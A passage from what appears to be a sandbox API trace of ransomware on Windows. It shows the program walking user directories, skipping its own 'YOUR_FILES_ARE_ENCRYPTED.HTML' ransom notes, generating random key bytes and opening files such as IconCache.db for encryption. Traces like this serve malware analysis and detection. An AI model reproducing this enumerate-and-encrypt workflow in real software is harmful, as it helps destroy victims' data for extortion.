Size=0x10000) returned 0x74ea008 [0170.205] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft" [0170.205] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*" [0170.205] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x99c671b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0170.205] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 133 [0170.205] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0170.205] lstrlenW (lpString=".swidtag") returned 8 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0170.205] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b3500, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x7c798490, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x45b3500, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0170.205] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 129 [0170.205] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.205] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0170.206] lstrlenW (lpString=".swidtag") returned 8 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 132 [0170.206] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0170.206] lstrlenW (lpString=".swidtag") returned 8 [0170.206] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.206] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.206] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.206] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0170.206] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0170.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.206] GetProcessHeap () returned 0x270000 [0170.207] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.207] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0170.207] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Start Menu") returned 33 [0170.207] GetProcessHeap () returned 0x270000 [0170.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.207] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu") returned="\\\\?\\C:\\Users\\All Users\\Start Menu" [0170.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Start Menu\\*") returned="\\\\?\\C:\\Users\\All Users\\Start Menu\\*" [0170.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="膠݀")) returned 0xffffffff [0170.207] GetProcessHeap () returned 0x270000 [0170.208] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.208] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0170.208] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Templates") returned 32 [0170.208] GetProcessHeap () returned 0x270000 [0170.208] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.208] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\All Users\\Templates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates") returned="\\\\?\\C:\\Users\\All Users\\Templates" [0170.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates\\*") returned="\\\\?\\C:\\Users\\All Users\\Templates\\*" [0170.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="膠݀")) returned 0xffffffff [0170.209] GetProcessHeap () returned 0x270000 [0170.209] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0170.209] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd039ec0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.210] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.210] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd039ec0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.210] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0170.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.210] GetProcessHeap () returned 0x270000 [0170.211] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0170.213] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0170.213] GetProcessHeap () returned 0x270000 [0170.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea008 [0170.213] lstrcpyW (in: lpString1=0x74ea008, lpString2="\\\\?\\C:\\Users\\Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0170.213] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*") returned="\\\\?\\C:\\Users\\Default\\*" [0170.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0170.213] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc8e9ac0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc8e9ac0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.214] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="AppData", cAlternateFileName="")) returned 1 [0170.214] GetProcessHeap () returned 0x270000 [0170.214] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.215] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\AppData" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData") returned="\\\\?\\C:\\Users\\Default\\AppData" [0170.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*" [0170.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0170.215] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.216] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Local", cAlternateFileName="")) returned 1 [0170.216] GetProcessHeap () returned 0x270000 [0170.216] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.219] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local" [0170.219] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*" [0170.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.221] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xdf9ec9b7, ftLastWriteTime.dwHighDateTime=0x1cb88f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.222] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0170.222] GetProcessHeap () returned 0x270000 [0170.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.222] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" [0170.222] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*" [0170.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x7690008, ftCreationTime.dwLowDateTime=0x74ea008, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0170.223] GetProcessHeap () returned 0x270000 [0170.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0170.224] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 1 [0170.224] GetProcessHeap () returned 0x270000 [0170.224] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.224] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" [0170.224] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*" [0170.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x7690008, ftCreationTime.dwLowDateTime=0x74ea008, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebd8a8, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0170.224] GetProcessHeap () returned 0x270000 [0170.225] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0170.226] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xbc868a8e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xbd7c4, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0170.226] lstrcmpW (lpString1="IconCache.db", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.226] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0170.226] lstrlenW (lpString=".db") returned 3 [0170.226] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0170.226] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0170.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0170.226] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=776132) returned 1 [0170.227] GetProcessHeap () returned 0x270000 [0170.227] RtlAllocateHeap 